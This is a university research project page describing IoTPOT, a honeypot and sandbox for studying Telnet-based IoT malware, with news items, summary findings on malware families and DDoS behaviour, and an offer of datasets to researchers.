TOP > 研究成果 > IoTPOT – Analysing the Rise of IoT Compromises

研究成果

IoTPOT – Analysing the Rise of IoT Compromises


News

2016/5/27 Our IoTPOT paper was accepted for IPSJ Journal.
2016/4/13 Invited Talk on IoT security at NHK Broadcasting Center.
2016/4/13 Our IoTPOT work is mentioned in the web article on cyber security by NHK.
2016/03/21,23 Our IoTPOT work is reported by Yomiuri Shimbun Newspaper.(Article, 2016/3/21)2016:03:23:00:00:00
2016/03/17 Invited Talk at IEICE General Conference 20162016:03:17:00:00:00
2016/03/10 Moose Worm targets to infect a large number2016:03:10:00:00:00
2016/03/10 REINCARNA - Increasing Linux.Wifatch infected devices2016:03:10:00:00:00
2016/03/10 Vulnerability in possibility of runnig arbitrary codes in router through 53413/UDP 2016:03:10:00:00:00
2016/03/10 Vulnerability in leakage of DVR setting file2016:03:10:00:00:00
2016/02/05 Invited Talk at Nikkei BP's Information Security Summit 2016 Spring (in Japanese)2016:02:05:00:00:00
2015/12/21 Invited Talk at Information Security Seminar at Bank of Japan2015:12:21:00:00:00
2015/12/16 Invited Talk at Security Day 2015 (in Japanese)2015:12:16:00:00:00
2015/12/12 Invited Talk at SCHOOL OF INFORMATION SCIENCE SEMINAR 2015 in JAIST (in Japanese)2015:12:12:00:00:00
2015/12/11 Invited Talk at ASEAN-Japan Information Security Workshop for ISPs2015:12:11:00:00:00
2015/12/01 Invited Talk at Nikkei BP's Security Forum (in Japanese)2015:12:01:00:00:00
2015/11/24 Invited Talk at JDC IoT Forum (in Japanese)2015:11:24:00:00:00
2015/09/30 Presented our IoTPOT work at IoT Security Forum 2015 (in Japanese)2015:09:30:00:00:00
2015/06/25 Our IoTPOT paper is accepted for USENIX WOOT 2015!2015:06:25:00:00:00
2015/06/17 Increasing number of IoT devices visiting to IoTPOT2015:06:17:00:00:00
2015/06/16 Updates of Available Dataset [Table -1 Malware binaries]2015:06:16:00:00:00
2015/06/16 IoTPOT captures new binaries of ZORRO family !2015:06:16:00:00:00
2015/06/16 IoTPOT captures new binaries of Bashlite family2015:06:16:00:00:00
2015/06/08 IoTPOT Captures New Malware2015:06:01:16:00:00
2015/06/08 Increasing Number of Captured Malware By IoTPOT2015:06:01:16:00:00
2015/06/08 Variety of IoT devices visit IoTPOT2015:06:01:16:00:00

Contents

  1. Research Description
  2. Available Datasets

Research Description

Please note that the following research description is from our preliminary results presented at USENIX WOOT2015. IoTPOT now emulates not only telnet but also other vulnerable services including those of specific devices with distributed proxy sensors in several countries. We have much more malware samples and have observed diverse behavior of IoT malware, such as click fraud and stealing credentials for pay-per-views. For more information, please also check our news articles. Also, if you are interested in our dataset and/or running our proxy sensor, please see here


We analyze the increasing threats against IoT devices. We first analyze Telnet-based scans in darknet, revealing that attacks on Telnet have rocketed since 2014. Moreover, by grabbing Telnet banners and web contents of the attackers, we confirm that the majority of attacks indeed stem from IoT devices.


Motivated by this, we implement IoTPOT, a novel honeypot to emulate Telnet services of various IoT devices to analyze ongoing attacks in depth. IoTPOT consists of a frontend low-interaction responder cooperating with backend high-interaction virtual environments called IoTBOX. IoTBOX operates various virtual environments commonly used by embedded systems for different CPU architectures. During 39 days of operation, we observed 76,605 download attempts of malware binaries from 16,934 visiting IP. We also confirm that none of these binaries could have been captured by existing honeypots that handle Telnet protocol such as honeyd and telnet password honeypot because they are not able to handle different incoming commands sent by the attackers.


We manually downloaded 43 distinct malware samples and found out that they run on 11 different CPU architectures. Among 43 collected samples, 39 samples were new to the database of VirusTotal(as of 2015/05/13) showing a gap of capturing utilities for this type of threat. Out of 4 samples that were in VirusTotal, 2 of them were not detected by any of the 57 A/Vs of VirusTotal (as of 2015/05/13).


In order to analyze these captured malware binaries, we implement IoTBOX, the first malware analysis environment for IoT devices. IoTBOX supports 8 CPU architectures, spanning MIPS, ARM, and PPC. The sandbox analysis of 17 samples by IoTBOX revealed that the samples are used to perform 10 different types of DDoS attacks and port 23 scans.


Finally, combining the observations results of IoTPOT with the sandbox analysis by IoTBOX, we confirm that:

  1. There are at least four distinct malware families spreading via Telnet
  2. Their common behavior is performing DDoS and further propagation over Telnet
  3. Some families evolve quickly, updating frequently and shipping binaries for a variety of CPU architectures, even in the limited observation period of 39 days

Available Datasets

The following datasets are available upon request for interested researchers.

  1. Malware binaries
  2. IoTPOT traffic
  3. Proxy program

Please note that we recently updated IoTPOT and now it has a proxy sensor to run on remote environment. If you could run the sensor at your environment, all attack traffic on the sensor would be redirected and handled to our honeypot center in Yokohama, Japan. Distributed proxy sensor on your environment will provide us additional visibility of attacks on IoT, especially those with locality. In return for runing the proxy, you will observe the attack traffic and malware samples captured on your sensor and some of our own sensors.

If you are interested in our dataset and/or setting up our proxy sensor at your environment, please contact to the following email addresses with a brief description of your research:

E-mail: ips-iotics@ml.ynu.ac.jp


This is a joint work between Yokohama National University, Japan and Saarland University, Germany.

Last Update: 2016/06/27